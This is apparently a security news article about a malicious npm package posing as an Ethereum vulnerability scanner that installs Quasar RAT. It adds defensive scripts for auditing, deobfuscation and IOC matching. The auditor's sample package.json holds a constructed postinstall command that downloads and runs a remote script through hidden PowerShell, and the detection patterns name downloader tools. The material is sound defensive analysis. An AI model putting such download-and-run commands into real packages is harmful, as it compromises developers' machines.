A malicious npm package, ethereumvulncontracthandler, disguised as a tool for detecting Ethereum smart contract vulnerabilities, has been uncovered deploying Quasar RAT, a powerful remote access trojan (RAT).
This alarming discovery by Socket researchers shows the growing trend of supply chain attacks targeting software developers.
Key Takeaway
- Threat actors continue to use deceptive practices to exploit software supply chains, making vigilance and security essential for developers and organizations.
Malicious Actors on the Prowl: Hiding in Plain Sight
Researchers at Socket have uncovered a devious ploy by cybercriminals. They discovered a malicious NPM package cleverly disguised as a tool for detecting vulnerabilities in Ethereum smart contracts.
However, instead of safeguarding your system, this malicious package, named “ethereumvulncontracthandler”, deploys a nasty surprise: Quasar RAT, a highly versatile remote access trojan.
This malicious package was uploaded on December 18, 2024, by a threat actor using the alias “solidit-dev-416” on the npm registry.
Upon installation, it retrieves a script from a remote server and executes it silently in the background, deploying the RAT on Windows systems.
While the malicious package was still live on npm at the time of publishing this article, researchers have petitioned for its removal.
Breaking Down the Threat
How the Malicious Package Works
The npm package ethereumvulncontracthandler was published on December 18, 2024, by a threat actor using the alias “solidit-dev-416.”
Marketed as an AI-powered tool for Ethereum developers to identify vulnerabilities in smart contracts, the package secretly installs Quasar RAT upon execution.
How It Installs:
- Obfuscation: The malicious code is hidden behind multiple layers of Base64 encoding, XOR encoding, and function wrapping.
- Execution: Once installed, the package retrieves a remote script from hxxps://jujuju.lat/files/kk.cmd and executes it silently.
- Deployment: This script installs Quasar RAT on Windows systems, giving attackers remote access to the victim’s computer.
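As an added example (not code from the Socket report or from the package itself), the Node script below audits a package.json for install-time scripts that download and run remote code, which is the behaviour the list above describes. It assumes the loader was wired into a lifecycle hook such as postinstall; the article does not say which hook the real package used. The sample package.json, its command text and the example.invalid host are constructed for illustration.

```javascript
// Added example (not the Socket report's code): audit an npm package's lifecycle
// scripts for the download-and-execute pattern described in the article. It
// assumes the loader is wired into an install hook such as postinstall; the
// article does not say which hook the real package used.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish', 'preprepare', 'postprepare'];

// Each pattern is a strong signal on its own when it appears in an install hook.
const SUSPICIOUS_PATTERNS = [
  { name: 'remote-url',        re: /https?:\/\/[^\s'"]+/i },
  { name: 'downloader',        re: /\b(curl|wget|Invoke-WebRequest|iwr|bitsadmin|certutil)\b/i },
  { name: 'shell-interpreter', re: /\b(powershell|pwsh|cmd(\.exe)?\s+\/c|sh\s+-c)\b/i },
  { name: 'inline-eval',       re: /\bnode\s+-e\b|\beval\(|new Function\(/i },
  { name: 'hidden-window',     re: /-w(indowstyle)?\s+hidden|-nop\b|-enc(odedcommand)?\b/i },
];

// Returns one finding per lifecycle hook whose command trips at least one pattern.
function auditLifecycleScripts(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = SUSPICIOUS_PATTERNS.filter(p => p.re.test(command)).map(p => p.name);
    if (indicators.length > 0) findings.push({ hook, command, indicators });
  }
  return findings;
}

// Constructed package.json that mimics the loader's behaviour. The command text
// and the example.invalid host are illustrative, not the real package's script.
const SAMPLE_PACKAGE_JSON = {
  name: 'ethereumvulncontracthandler',
  version: '1.0.0',
  scripts: {
    postinstall: 'node -e "require(\'child_process\').execSync(\'powershell -w hidden -c iwr https://example.invalid/files/kk.cmd -OutFile kk.cmd; kk.cmd\')"',
    test: 'mocha',
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_PACKAGE_JSON), null, 2));
}
```

Run it against the package.json of an unpacked tarball before installing (npm pack fetches the tarball without running any scripts), and consider npm install --ignore-scripts or npm config set ignore-scripts true as a default, re-enabling scripts only for packages that genuinely need a build step.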
What is Quasar RAT?
Quasar RAT is a dangerous tool that has been around for nearly a decade and is a favorite among cybercriminals and APT (Advanced Persistent Threat) groups.
This RAT goes beyond just providing remote access to a victim’s machine. It boasts a robust arsenal of capabilities including:
- Keystroke logging
- Taking screenshots
- Stealing credentials
- Exfiltrating files
Imagine the potential damage this can cause, not just for individual developers but also for large organizations.
For instance, an Ethereum developer could have private keys and credentials that grant access to significant financial assets exposed.
Even more alarming, if a large organization’s development systems were compromised with Quasar RAT, this could pave the way for a large-scale data breach across the entire enterprise.
Quasar RAT’s Capabilities
Quasar RAT is not new to the cybercrime scene. It’s been widely used in attacks for its robust features, including:
- Keystroke logging to steal sensitive information.
- Screenshot capturing to monitor user activity.
- Credential harvesting for further exploitation.
- File exfiltration, allowing attackers to steal valuable data.
For Ethereum developers, the implications are severe. Private keys and credentials linked to financial assets can be exposed, potentially resulting in significant monetary loss.
Threat Actor’s Strategy
To evade detection, the attacker employed several deceptive tactics:
- System Checks: The package verified system resources to avoid execution in virtual environments or analysis sandboxes.
- Persistent Malware: The RAT modified the Windows Registry to ensure it restarts after system reboots.
- Deceptive Naming: It renamed itself to client.exe to avoid suspicion.
This level of sophistication shows how determined attackers are in targeting software developers and enterprises.
Deception by Design: How Did They Do It?
The threat actors behind this malicious package went to great lengths to ensure it remained hidden and undetected for as long as possible. Here are some of the cunning tactics they employed:
- Obfuscation Everywhere: The code for “ethereumvulncontracthandler” was heavily obfuscated using multiple layers, making it extremely difficult to analyze. Techniques like Base64 and XOR encoding, function wrapping, and minification were all used to hinder static analysis and evade detection by security software.
- Resourceful and Cautious: The malicious code also included checks to verify system resources, such as available memory, to avoid execution in automated analysis sandboxes typically used to detect malware.
- Cunning Delivery System: The initial npm package acted as a loader, cleverly retrieving and executing Quasar RAT from a remote server, adding another layer of deception.
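The Base64 and XOR layering mentioned both under How It Installs and in the list above is the kind of thing an analyst peels by hand; the following example, written for this article as an illustration and not Socket's tooling or the package's code, does it mechanically on a constructed payload. It assumes single-byte XOR keys, which the article does not specify, and builds its own sample inline, so the real package's layers, key and payload are not reproduced.

```javascript
// Added example (not Socket's analysis tooling): peel the Base64 and single-byte
// XOR layers described in the article from a constructed payload. The real
// package's layering, key and payload are not reproduced; the sample is built inline.

const BASE64_RE = /^[A-Za-z0-9+/]+={0,2}$/;

function xorBytes(buf, key) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ key;
  return out;
}

// Scores how much a byte string looks like source text. Any control byte other
// than tab, LF or CR disqualifies the candidate; spaces and lowercase letters
// carry the most weight, which is what separates the true key from near misses.
function textScore(buf) {
  let score = 0;
  for (const b of buf) {
    if (b === 0x20 || b === 0x0a) score += 3;
    else if (b >= 0x61 && b <= 0x7a) score += 2;
    else if ((b >= 0x41 && b <= 0x5a) || (b >= 0x30 && b <= 0x39)) score += 1;
    else if (b === 0x09 || b === 0x0d) score += 3;
    else if (b < 0x20 || b >= 0x7f) return -1;
  }
  return score;
}

// Brute-force the single-byte key; key 0 means "no XOR layer here".
function bestXorKey(buf) {
  let best = { key: 0, score: -Infinity };
  for (let key = 0; key < 256; key++) {
    const score = textScore(xorBytes(buf, key));
    if (score > best.score) best = { key, score };
  }
  return best;
}

// Repeatedly strip Base64 wrappers and XOR layers until nothing more comes off.
function peel(text, maxLayers = 8) {
  const steps = [];
  let cur = Buffer.from(text, 'utf8');
  for (let i = 0; i < maxLayers; i++) {
    const s = cur.toString('latin1').trim();
    if (s.length % 4 === 0 && BASE64_RE.test(s)) {
      cur = Buffer.from(s, 'base64');
      steps.push('base64');
      continue;
    }
    const { key } = bestXorKey(cur);
    if (key === 0) break;
    cur = xorBytes(cur, key);
    steps.push('xor:0x' + key.toString(16).padStart(2, '0'));
  }
  return { plaintext: cur.toString('utf8'), steps };
}

// Constructed sample: a loader-like snippet, XORed with 0x5a, then Base64 twice.
const SAMPLE_KEY = 0x5a;
const SAMPLE_PLAINTEXT =
  'const cp = require("child_process");\ncp.exec("powershell -w hidden -c kk.cmd", () => {});\n';

function obfuscate(plain, key) {
  const xored = xorBytes(Buffer.from(plain, 'utf8'), key);
  const inner = xored.toString('base64');
  return Buffer.from(inner, 'utf8').toString('base64');
}

const SAMPLE_PAYLOAD = obfuscate(SAMPLE_PLAINTEXT, SAMPLE_KEY);

if (typeof require !== 'undefined' && require.main === module) {
  const result = peel(SAMPLE_PAYLOAD);
  console.log(result.steps.join(' -> '));
  console.log(result.plaintext);
}
```

The scorer rejects any candidate containing control bytes and favours spaces and lowercase letters, which is enough to pick the right key over near misses on this sample. Real loaders add function wrapping and minification on top, so the output of peel is usually the input to a JavaScript beautifier rather than the end of the analysis.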
The Malware’s Nefarious Actions
Once the malicious NPM package is installed, it initiates a two-step attack:
- Download and Installation: The package downloads a malicious script from a remote server.
- Taking Root: Upon execution, the script runs hidden PowerShell commands, silently installing Quasar RAT (SHA256: 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876) on the victim’s system.
To ensure persistence and continued operation after a system reboot, the malware modifies a key in the Windows registry, adding itself to the startup sequence. It cleverly renames itself to the innocuous-sounding “client.exe” to avoid raising any suspicion.
With Quasar RAT now firmly established, the focus shifts to maintaining control and stealing data. The malware communicates with a command and control (C2) server, captchacdn[.]com on port 7000 (IP address 154.216.17.47 in the IOC list below), to receive instructions and exfiltrate stolen data.
This C2 server likely serves as a central hub, allowing the threat actors to manage and control multiple compromised devices, potentially forming a large botnet.
The victim’s machine is now under the complete control of the threat actor, who can monitor their activities, steal sensitive information, and use the compromised system for further malicious activities.
Recommendations and Mitigations
This incident highlights the importance of robust security practices, particularly when dealing with third-party code. Here are some key recommendations:
- Scrutinize Third-Party Code: Exercise extreme caution when incorporating third-party code into your projects. Be especially wary of packages claiming advanced functionality or coming from unknown or less reputable sources. Because this package did its damage at install time, installing with lifecycle scripts disabled (npm install --ignore-scripts, or npm config set ignore-scripts true) removes that foothold for packages that do not genuinely need a build step.
- Monitor Network Traffic: Keep a close eye on your network traffic for any unusual outbound connections. These could be a sign of a compromised system communicating with a C2 server.
- Investigate Unexpected File Modifications: Regularly check for any unexpected changes to files on your system. This could indicate malicious activity.
- Use Security Tools: Employ reputable security tools to continuously assess the integrity of your software dependencies. Tools like Socket’s GitHub app, CLI tool, or browser extension can provide real-time insight into the security of your supply chain, alerting you to potentially malicious components. This matters more as obfuscated npm packages posing as developer tools, like this Ethereum one, keep appearing.
- Stay Updated: Keep your systems and software up to date with the latest security patches. This helps to close known vulnerabilities that attackers could exploit.
The Future of Supply Chain Attacks
Unfortunately, I anticipate that these types of supply chain attacks will continue to rise in frequency and sophistication.
Attackers are constantly seeking new ways to infiltrate systems, and compromising the software supply chain offers a highly effective way to reach a large number of victims through a single point of entry.
We must remain vigilant and proactive in our security measures to combat this growing threat.
Indicators of Compromise (IOCs)
These are key pieces of information that can help you identify if your system has been compromised:
IOC Type | Value |
---|---|
Malicious npm Package | ethereumvulncontracthandler |
Quasar RAT SHA256 | 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876 |
Malicious Download URL | hxxps://jujuju[.]lat/files/kk.cmd (defanged) |
C2 Server | captchacdn[.]com:7000 |
C2 IP Address | 154.216.17[.]47 |
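As an added example rather than anything from the Socket report, the script below turns the IOC table into matching rules and runs them over a constructed log excerpt (proxy, EDR, Sysmon-style registry, DNS and flow records). The log lines, field names and file paths are constructed; the Run key value name and the path under AppData are assumptions, since the article only says the RAT adds itself to the startup sequence under the name client.exe. Only the hash, hostnames and IP address come from the table.

```javascript
// Added example (not from the Socket report): match the article's IOCs against
// host and network log lines. The log lines, field names and paths are
// constructed for illustration; only the IOC values come from the article.

const IOCS = {
  quasar_sha256: '9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876',
  payload_host: 'jujuju.lat',
  c2_domain: 'captchacdn.com',
  c2_ip: '154.216.17.47',
};

const escapeRe = s => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');

// Hostname and IP rules use boundaries so "notcaptchacdn.com" or
// 154.216.17.470 do not produce false positives.
const RULES = [
  { type: 'quasar_sha256',      re: new RegExp(IOCS.quasar_sha256, 'i') },
  { type: 'payload_host',       re: new RegExp('(?<![\\w.-])' + escapeRe(IOCS.payload_host) + '(?![\\w-])', 'i') },
  { type: 'c2_domain',          re: new RegExp('(?<![\\w.-])' + escapeRe(IOCS.c2_domain) + '(?![\\w-])', 'i') },
  { type: 'c2_ip',              re: new RegExp('(?<![\\d.])' + escapeRe(IOCS.c2_ip) + '(?![\\d.])') },
  // Persistence described in the article: a Run key pointing at the renamed client.exe.
  // The value name and AppData path in the sample are assumptions.
  { type: 'run_key_client_exe', re: /\\CurrentVersion\\Run\\.*\bclient\.exe\b/i },
];

// Returns every (line, rule) pair that matched, in line order.
function scanLines(lines) {
  const hits = [];
  lines.forEach((text, idx) => {
    for (const rule of RULES) {
      if (rule.re.test(text)) hits.push({ line: idx + 1, type: rule.type, text });
    }
  });
  return hits;
}

// Constructed log excerpt: proxy, EDR, Sysmon-style registry (EventID 13 is
// RegistryEvent/Value Set), DNS and flow records. 203.0.113.10 is a documentation address.
const SAMPLE_LOG = [
  String.raw`2024-12-19T10:01:58Z proxy method=GET url=https://jujuju.lat/files/kk.cmd ua=PowerShell/5.1`,
  String.raw`2024-12-19T10:02:10Z edr event=FileCreate path=C:\Users\dev\AppData\Roaming\client.exe sha256=9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876`,
  String.raw`2024-12-19T10:02:11Z sysmon EventID=13 TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Client Details=C:\Users\dev\AppData\Roaming\client.exe`,
  String.raw`2024-12-19T10:02:12Z dns query=captchacdn.com type=A`,
  String.raw`2024-12-19T10:02:12Z flow src=10.0.0.12:51844 dst=154.216.17.47:7000 proto=tcp`,
  String.raw`2024-12-19T10:03:00Z flow src=10.0.0.12:51901 dst=203.0.113.10:443 proto=tcp`,
  String.raw`2024-12-19T10:03:05Z dns query=notcaptchacdn.com type=A`,
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of scanLines(SAMPLE_LOG)) console.log(`line ${hit.line}: ${hit.type}`);
}
```

The seventh sample line is there to show the boundary handling: a sibling domain such as notcaptchacdn.com is not reported. To run it over real data, replace SAMPLE_LOG with fs.readFileSync(path, 'utf8').split('\n').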
MITRE ATT&CK Techniques
The attack employed several tactics and techniques documented in the MITRE ATT&CK framework:
Technique ID | Technique Name |
---|---|
T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain |
T1059.007 | Command and Scripting Interpreter: JavaScript |
T1036.005 | Masquerading: Match Legitimate Name or Location |
T1027 | Obfuscated Files or Information |
T1059.001 | Command and Scripting Interpreter: PowerShell |
T1546.016 | Event Triggered Execution: Installer Packages |
T1105 | Ingress Tool Transfer |
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys |
T1056.001 | Input Capture: Keylogging |
T1113 | Screen Capture |
T1005 | Data from Local System |
T1071.001 | Application Layer Protocol: Web Protocols |
T1041 | Exfiltration Over C2 Channel |
Real-Life Example of Supply Chain Attacks
This recent attack reminds me of the Codecov supply chain attack in 2021, where attackers compromised Codecov’s Bash Uploader script, potentially exposing secrets from numerous customer repositories.
This incident, just like the malicious NPM package incident, emphasizes the critical need for robust supply chain security.
Mitigating the Risk
To protect against similar threats:
- Use Trusted Tools: Employ security tools like Socket’s GitHub app to monitor your dependencies.
- Monitor Network Activity: Check for unusual outbound connections that may indicate malicious activity.
- Review Packages Carefully: Avoid installing packages from unknown authors without verifying their authenticity.
- Train Your Team: Educate developers on identifying suspicious code and dependencies.
Forecast: The Rising Threat of Supply Chain Attacks
As software development becomes increasingly collaborative, threat actors are likely to continue targeting platforms like npm, PyPI, and GitHub. The trend indicates a need for stricter controls and better awareness among developers.
Expect more tools to emerge that enhance transparency and security in software supply chains.
Rounding Up
The discovery of a malicious obfuscated NPM package disguised as an Ethereum tool, deploying Quasar RAT, is a stark reminder of the ever-evolving threat landscape. It underscores the critical need for vigilance and robust security practices, especially when dealing with third-party code.
By staying informed, employing effective security tools, and adopting a proactive approach to security, we can better protect ourselves from these types of attacks.
Treat any downloaded package with suspicion, especially one that, like this Ethereum tool, arrives heavily obfuscated and promises advanced functionality.
About Socket
Socket is a trusted platform offering tools to enhance the security of software supply chains. Their GitHub app and CLI tool provide real-time monitoring and alerts for suspicious activities. Learn more at Socket.dev.
FAQs
What is the ethereumvulncontracthandler package?
- It’s a malicious npm package disguised as a tool for detecting vulnerabilities in Ethereum smart contracts but actually deploys Quasar RAT.
What is Quasar RAT?
- Quasar RAT is a remote access trojan capable of logging keystrokes, capturing screenshots, stealing credentials, and exfiltrating files.
How can developers protect themselves from such threats?
- Vet third-party code carefully, use trusted tools to monitor dependencies, watch network traffic for unusual outbound connections, investigate unexpected file modifications, and keep your systems updated.
What makes supply chain attacks so dangerous?
- They exploit trusted software ecosystems, potentially compromising thousands of users or organizations with a single malicious package.
Are there tools to detect malicious packages?
- Yes, tools like Socket’s GitHub app and CLI tool can help identify and block suspicious packages.
What is an NPM package?
- npm is the package manager for Node.js and the wider JavaScript ecosystem. It is used to share and manage reusable pieces of code called packages.
What is obfuscation?
- Obfuscation is the process of making code difficult to understand, making it harder for security researchers to analyze and detect malicious behavior.
What should I do if I think I’ve been infected?
- Disconnect the computer from the network, treat every credential, API token and wallet private key that was on it as compromised (rotate the credentials and move funds to fresh wallets from a clean machine), run a full system scan with a reputable antivirus program, and consider reinstalling the operating system.
Is this the first time a malicious NPM package has been discovered?
- No, malicious packages are unfortunately found periodically. This highlights the importance of vigilance when using any third-party code.
What is the significance of the Ethereum connection?
- Ethereum, being associated with cryptocurrencies and valuable digital assets, makes it a prime target for attackers seeking financial gain.
How can I stay updated on these types of threats?
- Follow reputable security blogs, news sites, and organizations like Socket to stay informed about the latest threats and vulnerabilities. Check out CISA for more information